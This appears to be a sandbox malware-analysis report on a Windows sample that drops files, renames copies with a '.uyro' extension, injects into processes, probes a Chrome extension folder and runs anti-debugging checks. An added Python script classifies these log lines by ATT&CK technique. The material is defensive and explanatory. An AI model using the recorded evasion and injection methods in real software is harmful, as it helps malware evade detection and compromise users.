Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218C71C rdtsc 0_2_0218C71C
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 1_2_0040E670
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Thread delayed: delay time: 700000
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: U59WtZz2Sg.exe, 00000005.00000003.442737523.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMware7,1
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309384223.000000000087D000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_0040322F
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218B0A3 push dword ptr fs:[00000030h] 0_2_0218B0A3
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00405D0D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0042A57A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_00447CAC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218C71C rdtsc 0_2_0218C71C
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040485B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040485B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040A05B SetUnhandledExceptionFilter, 0_2_0040A05B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00405D0D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_004081E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004081E1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004329EC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004329BB SetUnhandledExceptionFilter, 1_2_004329BB
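
The evasion entries above mix deliberate anti-analysis checks (rdtsc timing, reading the PEB through fs:[30h], querying DebugPort, a 700000 thread delay, the Uninstall-key enumeration, VMware/Hyper-V strings in memory) with compiler-generated code: the IsDebuggerPresent calls listed next to SetUnhandledExceptionFilter, UnhandledExceptionFilter and TerminateProcess are the MSVC C runtime's fault-reporting path, not a check written by the malware author. The Python below is an added triage example, not part of this report and not Joe Sandbox code. It parses behaviour lines in the format shown here (sample lines copied from this section), maps each to a category and an ATT&CK technique, and gives IsDebuggerPresent a weight of zero when it appears in that CRT context. The rule names, weights and notes are the example's own choices.

```python
import re

# Added triage example (not Joe Sandbox code): classify behaviour lines of the
# form "Source: <process or memory dump> <observation>: <detail>" into
# anti-analysis categories. Sample lines are copied from this report; rule
# names, ATT&CK mappings and weights are this example's own choices.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Code function: 0_2_0218C71C rdtsc 0_2_0218C71C",
    "Source: C:\\Users\\user\\AppData\\Local\\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\\build2.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Thread delayed: delay time: 700000",
    "Source: U59WtZz2Sg.exe, 00000005.00000003.442737523.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \"VMware7,1",
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Code function: 0_2_0218B0A3 push dword ptr fs:[00000030h] 0_2_0218B0A3",
    "Source: C:\\Users\\user\\AppData\\Local\\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\\build2.exe Process queried: DebugPort",
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00405D0D",
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Code function: 1_2_00427756 cpuid 1_2_00427756",
    "Source: C:\\Users\\user\\Desktop\\U59WtZz2Sg.exe Key value queried: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid",
]

# Observation types that separate the "Source:" part from the detail text.
_KINDS = ("Code function|Registry key enumerated|Registry key value queried|Thread delayed|"
          "Binary or memory string|Process queried|Key value queried|Process information queried")
_LINE_RE = re.compile(r"^Source:\s+(?P<source>.+?)\s+(?P<kind>" + _KINDS + r"):\s*(?P<detail>.*)$")

# (rule, ATT&CK technique, weight, regex over the detail, analyst note)
RULES = [
    ("rdtsc timing check", "T1497.003", 2, re.compile(r"\brdtsc\b"),
     "two RDTSC reads around a probe; single-stepping or a sandbox hook inflates the delta"),
    ("PEB access via TEB", "T1622", 2, re.compile(r"fs:\[0*30h\]", re.I),
     "fs:[30h] is TEB->ProcessEnvironmentBlock on x86; PEB+2 is BeingDebugged, PEB+0x68 is NtGlobalFlag"),
    ("ProcessDebugPort query", "T1622", 2, re.compile(r"\bDebugPort\b"),
     "NtQueryInformationProcess(ProcessDebugPort) returns non-zero under a debugger"),
    ("IsDebuggerPresent", "T1622", 2, re.compile(r"\bIsDebuggerPresent\b"),
     "weight dropped to 0 when surrounded by the CRT fault-reporting APIs (compiler artefact)"),
    ("long thread delay", "T1497.003", 1, re.compile(r"delay time:\s*\d+"),
     "long sleeps run the sandbox out of analysis time"),
    ("installed-software enumeration", "T1497.001", 1, re.compile(r"More than \d+ enums for key .*\\Uninstall", re.I),
     "a short Uninstall list hints at a fresh sandbox image; stealers also report the list"),
    ("hypervisor string in memory", "T1497.001", 1, re.compile(r"VMware|Hyper-V|VirtualBox|VBox|QEMU", re.I),
     "may simply be what the process read from the sandbox host (SMBIOS, device names), not a check"),
    ("cpuid", "T1497.001", 1, re.compile(r"\bcpuid\b"),
     "hypervisor-present bit and vendor string"),
    ("MachineGuid read", "T1082", 1, re.compile(r"\bMachineGuid\b"),
     "commonly folded into the victim identifier"),
]

# In this company IsDebuggerPresent belongs to the MSVC CRT's fault-reporting
# path, not to a check the malware author wrote.
_CRT_FAULT_APIS = {"SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess"}


def parse_line(line):
    """Split one report line into (source, kind, detail); None for headings and other text."""
    m = _LINE_RE.match(line.strip())
    return (m["source"], m["kind"], m["detail"]) if m else None


def classify(line):
    """Return the list of findings (dicts) that the rules produce for one line."""
    parsed = parse_line(line)
    if parsed is None:
        return []
    source, _kind, detail = parsed
    apis = set(re.findall(r"[A-Za-z_]\w*", detail))
    findings = []
    for rule, technique, weight, rx, note in RULES:
        if not rx.search(detail):
            continue
        if rule == "IsDebuggerPresent" and len(apis & _CRT_FAULT_APIS) >= 2:
            weight = 0
        findings.append({"rule": rule, "technique": technique, "weight": weight,
                         "source": source, "note": note})
    return findings


def summarize(lines):
    """Aggregate findings: total score, techniques seen, and finding counts per source."""
    findings = [f for line in lines for f in classify(line)]
    return {
        "score": sum(f["weight"] for f in findings),
        "techniques": sorted({f["technique"] for f in findings}),
        "per_source": {s: sum(1 for f in findings if f["source"] == s)
                       for s in {f["source"] for f in findings}},
        "findings": findings,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LINES)
    for f in report["findings"]:
        print(f"[{f['technique']}] w={f['weight']} {f['rule']}: {f['note']}")
    print("score", report["score"], "techniques", report["techniques"])
```

The weights only rank lines for a human; what matters in practice is the caveat encoded in the rules: a hypervisor string in a memory dump and an IsDebuggerPresent inside the CRT fault path are both weak evidence on their own, while rdtsc, the PEB read and the DebugPort query are code the author chose to include.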

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Memory written: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
